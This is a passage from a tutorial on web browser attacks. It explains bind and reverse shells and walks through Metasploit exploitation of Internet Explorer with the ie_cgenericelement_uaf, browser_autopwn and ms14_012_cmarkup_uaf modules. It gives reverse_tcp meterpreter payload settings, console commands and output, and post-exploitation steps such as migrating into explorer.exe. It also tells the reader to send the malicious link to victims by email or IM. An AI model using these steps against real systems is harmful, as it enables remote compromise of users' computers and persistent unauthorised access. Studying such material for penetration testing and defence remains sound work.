WEB BROWSER ATTACKS Page 30 of 38 1. If the host is behind a NAT device or firewall. You won’t be able to connect to the remote port even if it was listening. 2. Once that port is open, you have to be the first user to connect to it. However, if someone else does that, you have just supplied a shell to someone else.
Basically, a bind shell design for opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session. However, a reverse shell also known as a connect-back, is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.
In the example below, we will have a look with reverse shell: set payload windows/meterpreter/reverse_tcp show options
Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ------EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port
Once, you select the meterpreter reverse TCP shell. You need to configure EXITFUNC, LHOST, and LPORT.
EXITFUNC - the default for the exploit is typically the best choice.
LHOST- Set with your IP address.
LPORT – Set should be a port that most hosts can get to on the Internet
This EXITFUNC function is useful when after exploiting a box, you need a clean exit.
WEB BROWSER ATTACKS Page 31 of 38 EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. There are four kinds for EXITFUNC value: none, SEH, thread and process and SEH used when there is a structured exception handler (SEH) which will restart the thread or process automatically whenever an error occurs. By default, it set to thread or process, which will call ExitThread or ExitProcess respectively. "none" will calls GetLastError.
LHOST this function enable payload to connect back with the system. LPORT will tell PORT where traffic will be forwarded. msf exploit(ie_cgenericelement_uaf) > set LHOST 10.103.54.54 LHOST => 10.103.54.54 msf exploit(ie_cgenericelement_uaf) > set LPORT 443 LPORT => 443 msf exploit(ie_cgenericelement_uaf ) > exploit [*] Exploit running as background job. [*] Started reverse handler on 10.103.54.54:443 [*] Using URL: http://0.0.0.0:80/single [*] Local IP: http://10.103.54.54:80/single [*] Server started.
Now we are done, the server is running and waiting for connections. To get shell just need to send “http:// 10.103.54.54:80/single” link to the victim, once he clicked the same, payload will trigger and you are done with exploit.
You can use the sysinfo command to gather more information from the target’s computer: [*]10.103.54.24 ie_cgenericelement_uaf - Requesting: /single [*]10.103.54.24 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3 [*]10.103.54.24 ie_cgenericelement_uaf - Sending HTML... [*] Sending stage (751104 bytes) to 10.103.54.24 [*] Meterpreter session 2 opened (10.103.54.54:3333 -> 10.103.54.24:5425) at 2015-07-01 21:38:42 -0300 meterpreter > sysinfo Computer: Hackit-PC OS : Windows 7 (Build 7600, ).
Arch : x86
WEB BROWSER ATTACKS Page 32 of 38 Language: en_US meterpreter > ps ... 608 explorer.exe x86 1 Hackit-PC\user C:\Windows\Explorer.EXE meterpreter > migrate 608[*] Migrating to 608...[*] Migration completed successfully.
Now, you have a shell open on the victim’s system, you are into the target system and can do whatever you want. If have already migrating process into explorer.exe so, if victim close the browser you can do your post exploitation stuff, until system off ;) Metasploit Browser Autopwn With the security devices such as firewall, IDS, UTM restrictions and patch management policies, Exploitation of systems has become much more n more difficult. However, one of the best way is to use of client-side attacks. It has required the user interaction to exploit the system and in most of the cases you can done with social engineering techniques.
In order to use this attack we have a great tool, remember! Yes, the Metasploit framework. Just use the browser_autopwn module. In the below mentioned screenshot you can see how see can configure and what default settings we have for this module.
As mentioned above we will set up the LHOST with our IP address, the SRVPORT with the port 8080 and the URIPATH with / to prevent Metasploit to set up any other random URL’s and finally run as mentioned in below screenshot.
After the execution of this module, we will notice that different exploits for a variety of browsers will start loading to our web server.
WEB BROWSER ATTACKS Page 33 of 38
WEB BROWSER ATTACKS Page 34 of 38 Now, Link is created by Metasploit we can share this link to victim through email, IM or any other method. Once user clicked on the malicious link, the autopwn module will try all these exploits in order to see if it can break into the client. Once exploits done, meterpreter sessions will be open as mentioned in the below screenshot.
Once you get shell or meterpreter session it’s good to swap process to another process. Because somehow browsers crash or close by victim, the meterpreter session or the shell access will remain active. Metasploit IE-10 exploit This Metasploit module exploits a use after free condition on Internet Explorer as used in the wild as part of "Operation SnowMan". The module uses Flash Player 12 in order to bypass ASLR and DEP.
To exploit Internet Explorer 10 version we will use exploit exploit/windows/browser/ms14_012_cmarkup_uaf. This module configuration and usage is quite simple and similar to browser Autopwn.
Follow similar steps as you have done above,
Step1: use exploit/windows/browser/ms14_012_cmarkup_uaf
WEB BROWSER ATTACKS Page 35 of 38 Step2: Show options (Set LHOST, SRVHOST, SRVPORT, URIPATH)
Step 3: finally, run
Once down, Link will be generated by Metasploit we can share the malicious link through email, IM or any other method. Once user clicked on the malicious link, the module will try all these exploits in order to see if it can break into the client. Once the exploit is done, meterpreter sessions will be open as mentioned in the below screenshot.
FIGURE 11: SCREENSHOT: TRYING TO EXPLOIT IE10 BY SENDING MULTIPLE PAYLOADS
FIGURE 12: SCREENSHOT: TRYING TO EXPLOIT IE10 BY SENDING MULTIPLE PAYLOADS
WEB BROWSER ATTACKS Page 36 of 38
FIGURE 13: SCREENSHOT: SUCCESSFULLY EXPLOIT IE10 AND METERPRETER SESSION CREATED
FIGURE 14: SCREENSHOT: TAKING METERPRETER SESSION FOR POST EXPLOITATION
FIGURE 15: SCREENSHOT: METERPRETER GETUID AND SYSINFO COMMAND SUCCESSFULLY RUNNING
WEB BROWSER ATTACKS Page 37 of 38 Reference • https://browserhacker.com/ • http://en.wikipedia.org/wiki/Google_Chrome • http://en.wikipedia.org/wiki/Web_browser • http://en.wikipedia.org/wiki/Firefox • https://en.wikipedia.org/wiki/Ettercap_%28software%29 • http://samy.pl/evercookie/ • http://www.webopedia.com/TERM/S/ssl_beast.html • http://heartbleed.com • https://en.wikipedia.org/wiki/HTTP_cookie • https://en.wikipedia.org/wiki/HTTP_cookie#Domain_and_Path • https://www.nethemba.com/blog/-/blogs/cookie-jar-overflow • https://www.hacking-lab.com/misc/downloads/Cookie_Path_is_not_a_Security_Boundary.pdf • http://wroot.org/posts/downgrade-https-connections-to-http-using-ettercap-filters/ • https://pentestlab.wordpress.com/2012/04/23/metasploit-browser-autopwn/ • http://www.engadget.com/2015/02/24/what-you-need-to-know-about-http-2/
WEB BROWSER ATTACKS Page 38 of 38